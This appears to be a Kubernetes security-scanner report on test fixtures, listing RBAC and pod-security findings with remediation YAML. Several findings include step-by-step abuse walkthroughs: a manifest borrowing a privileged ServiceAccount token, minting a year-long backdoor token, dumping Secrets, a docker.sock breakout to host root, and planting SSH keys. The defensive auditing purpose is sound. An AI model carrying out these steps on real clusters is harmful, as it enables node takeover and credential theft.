Inspect: kubectl get clusterrole cluster-admin -o yaml
Source binding: crb-cluster-admin
Inspect: kubectl get clusterrolebinding crb-cluster-admin -o yaml
Show raw JSON
{
  "api_groups": null,
  "namespace": "",
  "resources": null,
  "scope": "cluster",
  "source_binding": "crb-cluster-admin",
  "source_role": "cluster-admin",
  "verbs": null
}
HIGH

Cluster-wide pod creation enables token theft and node takeover

KUBE-PRIVESC-001 3 subjects Score 10.0

Affected subjects (3)

HIGH ServiceAccount/rbac-fixtures/sa-pod-create Cluster 10.0
Cluster-wide pod creation enables token theft and node takeover (ServiceAccount/rbac-fixtures/sa-pod-create)
Scope · Cluster Cluster-wide: applies to every current and future namespace
Category: Privilege Escalation Subject: ServiceAccount/rbac-fixtures/sa-pod-create Resource: RBACRule/cr-pod-create

Subject ServiceAccount/rbac-fixtures/sa-pod-create can create pods via ClusterRoleBinding crb-pod-create → ClusterRole cr-pod-create. Cluster-wide: applies to every current and future namespace.

Under Kubernetes' RBAC model, pod creation is one of the most powerful permissions because the API server does not police the privileges of the pod being created, only the create verb itself. A pod is a request to run code as a ServiceAccount; by choosing spec.serviceAccountName the attacker borrows the identity (and RBAC permissions) of any ServiceAccount in the target namespace, with the token mounted automatically at /var/run/secrets/kubernetes.io/serviceaccount/token.

Beyond identity hopping, a created pod can request hostPath, hostNetwork, hostPID, privileged: true, or SYS_ADMIN. None of those are blocked by RBAC; only Pod Security Admission or a policy engine (Kyverno, Gatekeeper, ValidatingAdmissionPolicy) can stop them. A typical attack mounts / from the host and reads /etc/kubernetes/pki/admin.conf directly.

Impact: Run arbitrary code as any ServiceAccount cluster-wide (including privileged ones); optionally request privileged/host-mount pods to escape to the underlying node.
How an attacker abuses this
Background
Subject · ServiceAccount

A ServiceAccount is an in-cluster identity assigned to pods. Every pod gets a token mounted at /var/run/secrets/kubernetes.io/serviceaccount/token, and that token is the credential. If an attacker reads that file from inside a compromised container (or creates a pod that mounts the token), they can call the API as the ServiceAccount, with whatever permissions the SA has been granted.

This is the most common pivot in real-world Kubernetes attacks: compromise one pod, steal its token, ride the token to wherever its RBAC allows.

Kubernetes docs ↗
Technique · Pod creation → ServiceAccount token theft

Anyone who can create pods in a namespace can mount any ServiceAccount in that namespace into the pod. Cluster-scoped pod-create lets you mount any ServiceAccount in any namespace. Once the pod is running, the attacker reads /var/run/secrets/kubernetes.io/serviceaccount/token from inside it, and now holds a token for that SA.

This is the single most common privilege-escalation pattern in production Kubernetes.
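The pod from step 2 of the walkthrough below needs nothing unusual; the only line that matters is serviceAccountName. Names and image are illustrative:

apiVersion: v1
kind: Pod
metadata:
  name: build-helper        # innocuous-looking name
  namespace: kube-system    # any namespace that contains a privileged ServiceAccount
spec:
  # The identity being borrowed; its token is mounted at the well-known path.
  serviceAccountName: clusterrole-aggregation-controller
  containers:
  - name: shell
    image: busybox
    # Keep the container alive long enough to read the mounted token.
    command: ["sleep", "3600"]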

  1. Attacker enumerates target namespaces with kubectl get sa -A to find privileged ServiceAccounts (e.g. kube-system/clusterrole-aggregation-controller).
  2. They craft a pod manifest with spec.serviceAccountName: <privileged-sa> and any container image they control.
  3. They kubectl apply -f the pod; the kubelet mounts the privileged ServiceAccount's JWT into the container at the well-known path.
  4. They exec into the pod (or have the container phone home), read the token, and replay it against the API server.
  5. Optionally, they instead create a pod with hostPID: true + privileged: true + hostPath of / and break out to the node.
Remediation
Remove direct pod-create rights from non-platform identities; have CI/CD or controllers create workload objects (Deployments) so the controller-manager creates the pod under its own ServiceAccount.
  1. Replace direct create on pods with create/update on deployments (or the appropriate workload controller).
  2. Enforce restricted Pod Security Standard via pod-security.kubernetes.io/enforce=restricted namespace label so privileged/hostPath pods are rejected at admission (see the label sketch after these steps).
  3. Add a Kyverno/Gatekeeper policy that requires automountServiceAccountToken: false on user-created pods, or pins them to a non-privileged ServiceAccount.
  4. Verify with kubectl auth can-i create pods --as=sa-pod-create -A returning no.
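The namespace label from step 2 is a one-line change; a sketch with a hypothetical namespace name:

apiVersion: v1
kind: Namespace
metadata:
  name: team-apps   # hypothetical
  labels:
    pod-security.kubernetes.io/enforce: restricted
    pod-security.kubernetes.io/enforce-version: latest

With enforce=restricted in place, pods requesting privileged mode, hostPath mounts, or host namespaces are rejected at admission regardless of who holds create pods.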
Evidence
Scope: Cluster
API groups: core/v1
Resources: pods
pods: Workload primitive: create = run code on the cluster
Verbs: create
create: Create new objects of this resource
Source role: cr-pod-create
Inspect: kubectl get clusterrole cr-pod-create -o yaml
Source binding: crb-pod-create
Inspect: kubectl get clusterrolebinding crb-pod-create -o yaml
Show raw JSON
{
  "api_groups": [
    ""
  ],
  "namespace": "",
  "resources": [
    "pods"
  ],
  "scope": "cluster",
  "source_binding": "crb-pod-create",
  "source_role": "cr-pod-create",
  "verbs": [
    "create"
  ]
}
HIGH ServiceAccount/vulnerable/privileged-reader Cluster 10.0
Cluster-wide pod creation enables token theft and node takeover (ServiceAccount/vulnerable/privileged-reader)
Scope · Cluster Cluster-wide: applies to every current and future namespace
Category: Privilege Escalation Subject: ServiceAccount/vulnerable/privileged-reader Resource: RBACRule/privileged-reader

Subject ServiceAccount/vulnerable/privileged-reader can create pods via ClusterRoleBinding privileged-reader → ClusterRole privileged-reader. Cluster-wide: applies to every current and future namespace.

Under Kubernetes' RBAC model, pod creation is one of the most powerful permissions because the API server does not police the privileges of the pod being created, only the create verb itself. A pod is a request to run code as a ServiceAccount; by choosing spec.serviceAccountName the attacker borrows the identity (and RBAC permissions) of any ServiceAccount in the target namespace, with the token mounted automatically at /var/run/secrets/kubernetes.io/serviceaccount/token.

Beyond identity hopping, a created pod can request hostPath, hostNetwork, hostPID, privileged: true, or SYS_ADMIN. None of those are blocked by RBAC; only Pod Security Admission or a policy engine (Kyverno, Gatekeeper, ValidatingAdmissionPolicy) can stop them. A typical attack mounts / from the host and reads /etc/kubernetes/pki/admin.conf directly.

Impact: Run arbitrary code as any ServiceAccount cluster-wide (including privileged ones); optionally request privileged/host-mount pods to escape to the underlying node.
How an attacker abuses this
Background
Subject · ServiceAccount

A ServiceAccount is an in-cluster identity assigned to pods. Every pod gets a token mounted at /var/run/secrets/kubernetes.io/serviceaccount/token, and that token is the credential. If an attacker reads that file from inside a compromised container (or creates a pod that mounts the token), they can call the API as the ServiceAccount, with whatever permissions the SA has been granted.

This is the most common pivot in real-world Kubernetes attacks: compromise one pod, steal its token, ride the token to wherever its RBAC allows.

Kubernetes docs ↗
Technique · Pod creation → ServiceAccount token theft

Anyone who can create pods in a namespace can mount any ServiceAccount in that namespace into the pod. Cluster-scoped pod-create lets you mount any ServiceAccount in any namespace. Once the pod is running, the attacker reads /var/run/secrets/kubernetes.io/serviceaccount/token from inside it, and now holds a token for that SA.

This is the single most common privilege-escalation pattern in production Kubernetes.

  1. Attacker enumerates target namespaces with kubectl get sa -A to find privileged ServiceAccounts (e.g. kube-system/clusterrole-aggregation-controller).
  2. They craft a pod manifest with spec.serviceAccountName: <privileged-sa> and any container image they control.
  3. They kubectl apply -f the pod; the kubelet mounts the privileged ServiceAccount's JWT into the container at the well-known path.
  4. They exec into the pod (or have the container phone home), read the token, and replay it against the API server.
  5. Optionally, they instead create a pod with hostPID: true + privileged: true + hostPath of / and break out to the node.
Remediation
Remove direct pod-create rights from non-platform identities; have CI/CD or controllers create workload objects (Deployments) so the controller-manager creates the pod under its own ServiceAccount.
  1. Replace direct create on pods with create/update on deployments (or the appropriate workload controller).
  2. Enforce restricted Pod Security Standard via pod-security.kubernetes.io/enforce=restricted namespace label so privileged/hostPath pods are rejected at admission.
  3. Add a Kyverno/Gatekeeper policy that requires automountServiceAccountToken: false on user-created pods, or pins them to a non-privileged ServiceAccount.
  4. Verify with kubectl auth can-i create pods --as=privileged-reader -A returning no.
Evidence
Scope: Cluster
API groups: core/v1
Resources: pods
pods: Workload primitive: create = run code on the cluster
Verbs: create
create: Create new objects of this resource
Source role: privileged-reader
Inspect: kubectl get clusterrole privileged-reader -o yaml
Source binding: privileged-reader
Inspect: kubectl get clusterrolebinding privileged-reader -o yaml
Show raw JSON
{
  "api_groups": [
    ""
  ],
  "namespace": "",
  "resources": [
    "pods"
  ],
  "scope": "cluster",
  "source_binding": "privileged-reader",
  "source_role": "privileged-reader",
  "verbs": [
    "create"
  ]
}
HIGH ServiceAccount/local-path-storage/local-path-provisioner-service-account Namespace 10.0
Pod creation in namespace local-path-storage enables token theft and node takeover (ServiceAccount/local-path-storage/local-path-provisioner-service-account)
Scope · Namespace Namespace local-path-storage only
Category: Privilege Escalation Subject: ServiceAccount/local-path-storage/local-path-provisioner-service-account Resource: RBACRule/local-path-storage/local-path-provisioner-role

Subject ServiceAccount/local-path-storage/local-path-provisioner-service-account can create pods via RoleBinding local-path-storage/local-path-provisioner-bind → Role local-path-storage/local-path-provisioner-role. Namespace local-path-storage only.

Under Kubernetes' RBAC model, pod creation is one of the most powerful permissions because the API server does not police the privileges of the pod being created, only the create verb itself. A pod is a request to run code as a ServiceAccount; by choosing spec.serviceAccountName the attacker borrows the identity (and RBAC permissions) of any ServiceAccount in the target namespace, with the token mounted automatically at /var/run/secrets/kubernetes.io/serviceaccount/token.

Beyond identity hopping, a created pod can request hostPath, hostNetwork, hostPID, privileged: true, or SYS_ADMIN. None of those are blocked by RBAC; only Pod Security Admission or a policy engine (Kyverno, Gatekeeper, ValidatingAdmissionPolicy) can stop them. A typical attack mounts / from the host and reads /etc/kubernetes/pki/admin.conf directly.

Impact: Run arbitrary code as any ServiceAccount in namespace local-path-storage (including privileged ones); optionally request privileged/host-mount pods to escape to the underlying node.
How an attacker abuses this
Background
Subject · ServiceAccount

A ServiceAccount is an in-cluster identity assigned to pods. Every pod gets a token mounted at /var/run/secrets/kubernetes.io/serviceaccount/token, and that token is the credential. If an attacker reads that file from inside a compromised container (or creates a pod that mounts the token), they can call the API as the ServiceAccount, with whatever permissions the SA has been granted.

This is the most common pivot in real-world Kubernetes attacks: compromise one pod, steal its token, ride the token to wherever its RBAC allows.

Kubernetes docs ↗
Technique · Pod creation → ServiceAccount token theft

Anyone who can create pods in a namespace can mount any ServiceAccount in that namespace into the pod. Cluster-scoped pod-create lets you mount any ServiceAccount in any namespace. Once the pod is running, the attacker reads /var/run/secrets/kubernetes.io/serviceaccount/token from inside it, and now holds a token for that SA.

This is the single most common privilege-escalation pattern in production Kubernetes.

  1. Attacker enumerates target namespaces with kubectl get sa -A to find privileged ServiceAccounts (e.g. kube-system/clusterrole-aggregation-controller).
  2. They craft a pod manifest with spec.serviceAccountName: <privileged-sa> and any container image they control.
  3. They kubectl apply -f the pod; the kubelet mounts the privileged ServiceAccount's JWT into the container at the well-known path.
  4. They exec into the pod (or have the container phone home), read the token, and replay it against the API server.
  5. Optionally, they instead create a pod with hostPID: true + privileged: true + hostPath of / and break out to the node.
Remediation
Remove direct pod-create rights from non-platform identities; have CI/CD or controllers create workload objects (Deployments) so the controller-manager creates the pod under its own ServiceAccount.
  1. Replace direct create on pods with create/update on deployments (or the appropriate workload controller).
  2. Enforce restricted Pod Security Standard via pod-security.kubernetes.io/enforce=restricted namespace label so privileged/hostPath pods are rejected at admission.
  3. Add a Kyverno/Gatekeeper policy that requires automountServiceAccountToken: false on user-created pods, or pins them to a non-privileged ServiceAccount.
  4. Verify with kubectl auth can-i create pods --as=local-path-provisioner-service-account -n local-path-storage returning no.
Evidence
Scope: Namespace
Namespace: local-path-storage
API groups: core/v1
Resources: pods
pods: Workload primitive: create = run code on the cluster
Verbs: get, list, watch, create, patch, update, delete
create: Create new objects of this resource
patch: Mutate existing objects in place
update: Replace existing objects
delete: Permanently remove objects
Source role: local-path-provisioner-role
Inspect: kubectl get role local-path-provisioner-role -n local-path-storage -o yaml
Source binding: local-path-provisioner-bind
Inspect: kubectl get rolebinding local-path-provisioner-bind -n local-path-storage -o yaml
Show raw JSON
{
  "api_groups": [
    ""
  ],
  "namespace": "local-path-storage",
  "resources": [
    "pods"
  ],
  "scope": "namespace",
  "source_binding": "local-path-provisioner-bind",
  "source_role": "local-path-provisioner-role",
  "verbs": [
    "get",
    "list",
    "watch",
    "create",
    "patch",
    "update",
    "delete"
  ]
}
HIGH

Cluster-wide read access to Secrets on ServiceAccount/vulnerable/privileged-reader

KUBE-PRIVESC-005 1 subject Score 10.0
MITRE ATT&CK: T1552.007 · T1528 · T1078.004

Affected subject

HIGH ServiceAccount/vulnerable/privileged-reader Cluster 10.0
Cluster-wide read access to Secrets on ServiceAccount/vulnerable/privileged-reader
Scope · Cluster Cluster-wide: applies to every current and future namespace
Category: Data Exfiltration Subject: ServiceAccount/vulnerable/privileged-reader Resource: RBACRule/privileged-reader

Subject ServiceAccount/vulnerable/privileged-reader can get, list, or watch core secrets via ClusterRoleBinding privileged-reader → ClusterRole privileged-reader. Cluster-wide: applies to every current and future namespace.

The Kubernetes documentation is explicit that list and watch reveal Secret contents in the response body (they are not metadata-only verbs), so all three verbs leak the same data.

Kubernetes Secrets typically hold ServiceAccount tokens, kubeconfigs, image-pull credentials, TLS private keys, database passwords, and integration secrets for cloud APIs. Once Secret contents are exposed, the holder can authenticate as the corresponding ServiceAccount/user, which usually amplifies the original blast radius far beyond 'read access'. Cluster-wide reads include kube-system ServiceAccount tokens, which are routinely cluster-admin-equivalent.

Impact: Cluster-wide read of every Secret (ServiceAccount tokens, TLS keys, registry credentials, integration secrets), enabling identity replay and cross-namespace lateral movement.
How an attacker abuses this
Background
Subject · ServiceAccount

A ServiceAccount is an in-cluster identity assigned to pods. Every pod gets a token mounted at /var/run/secrets/kubernetes.io/serviceaccount/token, and that token is the credential. If an attacker reads that file from inside a compromised container (or creates a pod that mounts the token), they can call the API as the ServiceAccount, with whatever permissions the SA has been granted.

This is the most common pivot in real-world Kubernetes attacks: compromise one pod, steal its token, ride the token to wherever its RBAC allows.

Kubernetes docs ↗
Technique · Secrets read access

get/list/watch on Secrets in kube-system or cluster-wide reads the controller-manager, scheduler, and node-bootstrap tokens: every credential needed to act as the control plane.

  1. Attacker reaches ServiceAccount/vulnerable/privileged-reader (compromised pod, leaked kubeconfig, or stolen token).
  2. They run kubectl get secrets -o yaml in scope and base64-decode every data field.
  3. They identify Secrets of type kubernetes.io/service-account-token (legacy) or call the TokenRequest API with harvested credentials.
  4. They replay the highest-privileged token against the API server (kubectl --token=<jwt> get clusterrolebindings).
  5. They pivot to cloud APIs using extracted IRSA / Workload Identity / cloud-provider credentials, or persist by writing a backdoor into a privileged Deployment.
Remediation
Remove get/list/watch on secrets from this subject; if a specific Secret is genuinely needed, scope by resourceNames to that one name.
  1. Confirm the workload genuinely needs API-time Secret access. Most apps consume Secrets via volume/env injection at pod start and don't need RBAC read.
  2. If runtime access is required, scope the rule by resourceNames to the exact Secret(s) the workload reads. Never leave it as 'all secrets'. Drop list and watch; keep only get (see the sketch after these steps).
  3. Move the binding from cluster-wide to namespace-scoped (RoleBinding instead of ClusterRoleBinding) so the blast radius is bounded.
  4. Verify with kubectl auth can-i list secrets --as=privileged-reader -A returning no.
  5. For sensitive Secrets (TLS keys, cloud credentials), consider an external secret store (Vault, AWS/GCP Secrets Manager via CSI driver) and enable encryption-at-rest with a KMS-backed EncryptionConfiguration.
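A sketch of the scoping from step 2, assuming the workload reads exactly one Secret at runtime; the role name and Secret name are hypothetical:

apiVersion: rbac.authorization.k8s.io/v1
kind: Role
metadata:
  name: read-one-secret   # hypothetical
  namespace: vulnerable   # bind only in the namespace that needs it
rules:
- apiGroups: [""]
  resources: ["secrets"]
  # get only: list and watch would return every Secret's contents in scope.
  verbs: ["get"]
  resourceNames: ["app-db-credentials"]   # hypothetical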
Evidence
Scope: Cluster
API groups: core/v1
Resources: secrets
secrets: Holds credentials, tokens, TLS keys
Verbs: get, list
Source role: privileged-reader
Inspect: kubectl get clusterrole privileged-reader -o yaml
Source binding: privileged-reader
Inspect: kubectl get clusterrolebinding privileged-reader -o yaml
Show raw JSON
{
  "api_groups": [
    ""
  ],
  "namespace": "",
  "resources": [
    "secrets"
  ],
  "scope": "cluster",
  "source_binding": "privileged-reader",
  "source_role": "privileged-reader",
  "verbs": [
    "get",
    "list"
  ]
}
HIGH

Cluster-wide create serviceaccounts/token enables token minting

KUBE-PRIVESC-014 1 subject Score 10.0
MITRE ATT&CK: T1098.001 · T1528 · T1078.004

Affected subject

HIGH ServiceAccount/rbac-fixtures/sa-token-create Cluster 10.0
Cluster-wide create serviceaccounts/token enables token minting (ServiceAccount/rbac-fixtures/sa-token-create)
Scope · Cluster Cluster-wide: applies to every current and future namespace
Category: Privilege Escalation Subject: ServiceAccount/rbac-fixtures/sa-token-create Resource: RBACRule/cr-token-create

Subject ServiceAccount/rbac-fixtures/sa-token-create can create on the serviceaccounts/token subresource via ClusterRoleBinding crb-token-create → ClusterRole cr-token-create. Cluster-wide: applies to every current and future namespace.

The TokenRequest API (Kubernetes 1.22+) is the canonical way to mint a JWT ServiceAccount token, and its create verb is gated by RBAC on the serviceaccounts/token subresource. Anyone holding this verb on a ServiceAccount can mint a token authenticated as that ServiceAccount.

Datadog Security Labs published a write-up on its abuse for persistence: an attacker mints a long-lived token for the highest-privileged ServiceAccount they can reach (commonly kube-system/clusterrole-aggregation-controller, which holds escalate on ClusterRoles), and uses that token as a backdoor that survives the original RBAC binding being removed. Crucially, this verb is NOT covered by 'list secrets' detections. TokenRequest tokens are NOT stored as Secret objects; they're issued live by the apiserver and never leave a footprint on disk.

Impact Mint a JWT for any ServiceAccount in any namespace. The cluster-wide grant trivially yields cluster-admin (mint a kube-system controller token). Tokens persist after the original binding is revoked.
How an attacker abuses this
Background
Subject: ServiceAccount

A ServiceAccount is an in-cluster identity assigned to pods. Every pod gets a token mounted at /var/run/secrets/kubernetes.io/serviceaccount/token, and that token is the credential. If an attacker reads that file from inside a compromised container (or creates a pod that mounts the token), they can call the API as the ServiceAccount, with whatever permissions the SA has been granted.

This is the most common pivot in real-world Kubernetes attacks: compromise one pod, steal its token, ride the token to wherever its RBAC allows.

Kubernetes docs ↗
Technique: TokenRequest minting

The create verb on serviceaccounts/token mints a fresh, valid token for any ServiceAccount in scope, with no pod required. Cleaner than the pod-creation route and harder to spot in audit logs.

  1. Attacker confirms the verb with kubectl auth can-i create serviceaccounts/token --as=system:serviceaccount:rbac-fixtures:sa-token-create -A.
  2. They enumerate high-privilege ServiceAccounts: kubectl get clusterrolebindings -o json | jq '.items[].subjects[]?.name' and pick one with cluster-admin, system:masters, or aggregated permissions.
  3. They mint a long-lived token via the TokenRequest API: kubectl create token <sa-name> -n <ns> --duration=8760h (1 year), or call /api/v1/namespaces/<ns>/serviceaccounts/<sa>/token directly.
  4. They kubectl --token=<jwt> get nodes and confirm the new identity.
  5. They cache the token off-cluster as a backdoor: rotating the original binding does NOT invalidate an issued token until its exp claim, which defaults to --service-account-max-token-expiration (often 1 year on legacy clusters).
Remediation
Remove create on serviceaccounts/token from non-control-plane identities; constrain any legitimate use with resourceNames to a tiny allowlist.
  1. Remove the verb. Outside kube-controller-manager and a small set of token-broker components, nothing should hold this.
  2. If a workload genuinely needs to mint tokens, scope with resourceNames to the exact ServiceAccounts it issues tokens for, never *.
  3. Enforce a low maximum token expiration cluster-wide via --service-account-max-token-expiration=1h on the API server (or the cloud equivalent).
  4. Capture every create on serviceaccounts/token at RequestResponse audit level and SIEM-alert on issuance to ServiceAccounts with cluster-admin/escalate/bind rights (see the audit-policy sketch after this list).
  5. Verify with kubectl auth can-i create serviceaccounts/token --as=system:serviceaccount:rbac-fixtures:sa-token-create -n kube-system returning no.
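A minimal audit-policy fragment for step 4 might look like the following; how it is wired into the API server (--audit-policy-file plus a log or webhook backend) depends on the distribution, and only the rule itself is shown:

# Capture TokenRequest issuance with full request/response bodies.
apiVersion: audit.k8s.io/v1
kind: Policy
rules:
  - level: RequestResponse
    verbs: ["create"]
    resources:
      - group: ""                            # core API group
        resources: ["serviceaccounts/token"]
  # ...the cluster's existing rules for everything else follow here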
Evidence
Scope: Cluster
API groups: core/v1
Resources: serviceaccounts/token
serviceaccounts/token: Mint short-lived ServiceAccount tokens
Verbs: create
create: Create new objects of this resource
Source role: cr-token-create
Inspect: kubectl get clusterrole cr-token-create -o yaml
Source binding: crb-token-create
Inspect: kubectl get clusterrolebinding crb-token-create -o yaml
Show raw JSON
{
  "api_groups": [
    ""
  ],
  "namespace": "",
  "resources": [
    "serviceaccounts/token"
  ],
  "scope": "cluster",
  "source_binding": "crb-token-create",
  "source_role": "cr-token-create",
  "verbs": [
    "create"
  ]
}
HIGH

Cluster-wide workload-controller mutation can spawn privileged pods on ServiceAccount/rbac-fixtures/sa-workload-mutate

KUBE-PRIVESC-003 1 subject Score 9.7
MITRE ATT&CK: T1610 · T1098 · T1078.004

Affected subject

HIGH ServiceAccount/rbac-fixtures/sa-workload-mutate Cluster 9.7
Cluster-wide workload-controller mutation can spawn privileged pods on ServiceAccount/rbac-fixtures/sa-workload-mutate
Scope · Cluster Cluster-wide: applies to every current and future namespace
Category: Privilege Escalation Subject: ServiceAccount/rbac-fixtures/sa-workload-mutate Resource: RBACRule/cr-workload-mutate

Subject ServiceAccount/rbac-fixtures/sa-workload-mutate can create/update/patch workload controllers (deployments, daemonsets, statefulsets, jobs, cronjobs) via ClusterRoleBinding crb-workload-mutate → ClusterRole cr-workload-mutate. Cluster-wide: applies to every current and future namespace.

Anyone who can write a workload template inherits the same implicit permissions as pods/create: choice of ServiceAccount, choice of Pod Security context, and choice of host-level features. The specific danger of controller mutation (vs. pod create) is durability and stealth: a kubectl edit deployment adding a privileged: true sidecar produces pods continuously, so restart-looping the pod returns a fresh shell every time.

DaemonSet write is the most dangerous variant because a DaemonSet runs one pod on every node, including new nodes added later. CronJobs offer time-based persistence that survives pod evictions, node reboots, and short-lived RBAC remediations. A realistic incident: an attacker with patch daemonsets in kube-system mutates kube-proxy to add a malicious sidecar inheriting the existing pod's host-mounts and ServiceAccount.

Impact Spawn (or mutate existing) pods running as any ServiceAccount in any namespace. DaemonSet write specifically yields one attacker pod per node, including future nodes.
How an attacker abuses this
Background
Subject: ServiceAccount

A ServiceAccount is an in-cluster identity assigned to pods. Every pod gets a token mounted at /var/run/secrets/kubernetes.io/serviceaccount/token, and that token is the credential. If an attacker reads that file from inside a compromised container (or creates a pod that mounts the token), they can call the API as the ServiceAccount, with whatever permissions the SA has been granted.

This is the most common pivot in real-world Kubernetes attacks: compromise one pod, steal its token, ride the token to wherever its RBAC allows.

Kubernetes docs ↗
  1. Attacker enumerates writable controllers with kubectl auth can-i patch daemonsets --as=system:serviceaccount:rbac-fixtures:sa-workload-mutate -A.
  2. They identify a high-value DaemonSet (e.g. kube-system/kube-proxy, kube-system/cilium, or any node-agent that already runs privileged).
  3. They kubectl patch to add a sidecar container under their control, inheriting the existing pod's host-mounts, capabilities, and ServiceAccount.
  4. The DaemonSet controller rolls the change to every node; the attacker now has a privileged shell on every node and a node-level token on each.
  5. They use the token to enumerate cluster Secrets and pivot to control-plane components. Persistence survives subject-token rotation because the malicious sidecar continues running.
Remediation
Restrict workload-controller mutation to platform/CI identities; route application changes through GitOps with PR review.
  1. Audit who has create/update/patch on deployments,daemonsets,statefulsets,jobs,cronjobs. Most application identities should not have this.
  2. Move deployment changes behind GitOps (Argo CD/Flux) so humans push to Git and the controller applies the change under its own ServiceAccount.
  3. Add a Kyverno/Gatekeeper policy that rejects pod templates with privileged, hostPID, hostNetwork, hostPath mounts, or automountServiceAccountToken: true outside an explicit allowlist (see the sketch after this list).
  4. For DaemonSets specifically, restrict creation to named platform ServiceAccounts. Verify with kubectl auth can-i create daemonsets --as=system:serviceaccount:rbac-fixtures:sa-workload-mutate -n kube-system returning no.
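Step 3 could be expressed as a Kyverno ClusterPolicy along these lines. This is a sketch of the common disallow-privileged-containers pattern (Kyverno v1 policy syntax assumed); a production policy would add analogous rules for the other fields mentioned above (hostPID, hostNetwork, hostPath):

apiVersion: kyverno.io/v1
kind: ClusterPolicy
metadata:
  name: disallow-privileged-containers   # illustrative name
spec:
  validationFailureAction: Enforce
  background: true
  rules:
    - name: privileged-containers
      match:
        any:
          - resources:
              kinds: ["Pod"]
      validate:
        message: "Privileged containers are not allowed."
        pattern:
          spec:
            containers:
              - =(securityContext):
                  =(privileged): "false"
            =(initContainers):
              - =(securityContext):
                  =(privileged): "false"

Kyverno's rule auto-generation applies Pod rules to controller templates as well, so a patched Deployment or DaemonSet is rejected before it rolls out privileged replicas.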
Evidence
Scope: Cluster
API groups: apps, batch
Resources: deployments, daemonsets, statefulsets, jobs, cronjobs
Verbs: create, update, patch
create: Create new objects of this resource
update: Replace existing objects
patch: Mutate existing objects in place
Source role: cr-workload-mutate
Inspect: kubectl get clusterrole cr-workload-mutate -o yaml
Source binding: crb-workload-mutate
Inspect: kubectl get clusterrolebinding crb-workload-mutate -o yaml
Show raw JSON
{
  "api_groups": [
    "apps",
    "batch"
  ],
  "namespace": "",
  "resources": [
    "deployments",
    "daemonsets",
    "statefulsets",
    "jobs",
    "cronjobs"
  ],
  "scope": "cluster",
  "source_binding": "crb-workload-mutate",
  "source_role": "cr-workload-mutate",
  "verbs": [
    "create",
    "update",
    "patch"
  ]
}

Pod Security

32 findings · 13 rules · 5 critical · 16 high · 10 medium · 1 low
CRITICAL

Docker socket mounted into Deployment/vulnerable/socket-mounts-app (volume docker-sock → /var/run/docker.sock)

KUBE-ESCAPE-005 1 subject Score 10.0
MITRE ATT&CK: T1611 · T1610 · T1068

Affected subject

CRITICAL Deployment/vulnerable/socket-mounts-app Workload 10.0
Docker socket mounted into Deployment/vulnerable/socket-mounts-app (volume docker-sock → /var/run/docker.sock)
Scope · Workload Workload Deployment/vulnerable/socket-mounts-app
Category: Privilege Escalation Resource: Deployment/vulnerable/socket-mounts-app Namespace: vulnerable

Workload Deployment/vulnerable/socket-mounts-app mounts the Docker UNIX socket /var/run/docker.sock from the node into the container (volume docker-sock). The Docker daemon listens on this socket as root and exposes the entire Docker Engine API, including POST /containers/create, which lets any client launch a new container with arbitrary mounts, devices, capabilities, and host-namespace settings.

Mounting docker.sock is equivalent to giving the workload an unrestricted root shell on the node. There is no permission boundary inside the Docker API; a "read-only" mount of the socket file does not help because the socket is a request channel, not a stored object. Once you can connect() to it, you can issue any command. The OWASP Docker Security Cheat Sheet calls this the top-priority anti-pattern, and HackTricks documents the breakout as a one-liner.

From inside the container, install the Docker CLI (or use curl --unix-socket) and run docker run -v /:/host --privileged --pid=host -it alpine chroot /host. The new container mounts the host root, runs as host root, and can drop a backdoor into /etc/cron.d/, steal /var/lib/kubelet/pki/, or nsenter -t 1 -a to land on the host directly.

Impact Equivalent to root on the node: launch any container with any mount, mount the host filesystem, steal kubelet certs, and pivot to the entire cluster.
How an attacker abuses this
Background
Resource: Deployment

A Deployment manages a ReplicaSet which manages Pods. The dangerous attribute lives on the pod template: every replica inherits the same ServiceAccount, the same securityContext, and the same volume mounts. A risky pod template multiplies into N risky pods.

Kubernetes docs ↗
Technique: Container escape to host

The pod is configured in a way that makes escaping to the underlying node trivial: privileged: true, hostPID, hostNetwork, or a sensitive hostPath mount (root, docker.sock, etc.). An attacker who controls the container reaches root on the node, then has access to every pod and kubelet credential on that node.

  1. Gain code execution in the pod with docker.sock mounted.
  2. Verify: ls -la /var/run/docker.sock; curl --unix-socket /var/run/docker.sock http://localhost/version.
  3. Spawn a privileged container that mounts host root: docker run -it --rm -v /:/host alpine chroot /host /bin/sh.
  4. Read kubelet client cert: cat /host/var/lib/kubelet/pki/kubelet-client-current.pem and use it to talk to the apiserver as system:node:<nodeName>.
  5. Persist by writing an SSH key to /host/root/.ssh/authorized_keys or installing a systemd service.
Remediation
Remove the docker.sock hostPath mount; do not run sibling-container patterns on Kubernetes.
  1. Identify why the workload talks to Docker. The usual suspects are a CI runner, log shipper, or build system. Replace with a Kubernetes-native alternative: Buildah/Kaniko/Buildkit-rootless for builds, the Kubernetes API for pod orchestration, fluent-bit's tail input for logs.
  2. Remove the hostPath: /var/run/docker.sock volume and corresponding volumeMount.
  3. Apply Pod Security Admission baseline to the namespace (forbids hostPath volumes) and/or use a Kyverno/OPA policy that explicitly denies this path; a namespace-label sketch follows this list.
  4. Validate: kubectl get deployment/socket-mounts-app -n vulnerable -o jsonpath='{.spec.template.spec.volumes}' | jq should not contain /var/run/docker.sock.
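The admission guardrail in step 3 is just a namespace label; applied declaratively it looks roughly like this (the version pin is optional):

apiVersion: v1
kind: Namespace
metadata:
  name: vulnerable
  labels:
    pod-security.kubernetes.io/enforce: baseline         # baseline forbids hostPath volumes
    pod-security.kubernetes.io/enforce-version: latest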
Evidence
Volume: docker-sock
Host path: /var/run/docker.sock
Docker socket (container engine takeover)
Show raw JSON
{
  "path": "/var/run/docker.sock",
  "volume": "docker-sock"
}
CRITICAL

Root filesystem (/) mounted from host into Deployment/vulnerable/risky-app

KUBE-ESCAPE-006 1 subject Score 10.0
MITRE ATT&CK: T1611 · T1552.001 · T1543

Affected subject

CRITICAL Deployment/vulnerable/risky-app Workload 10.0
Root filesystem (/) mounted from host into Deployment/vulnerable/risky-app
Scope · Workload Workload Deployment/vulnerable/risky-app
Category: Privilege Escalation Resource: Deployment/vulnerable/risky-app Namespace: vulnerable

Workload Deployment/vulnerable/risky-app mounts the host's root filesystem (hostPath: /) inside the container via volume rootfs. Combined with the container's UID (typically root), this exposes the entire node filesystem: kubelet credentials, every other pod's mounted secrets, the container runtime state, and on control-plane nodes the static-pod manifests under /etc/kubernetes/manifests.

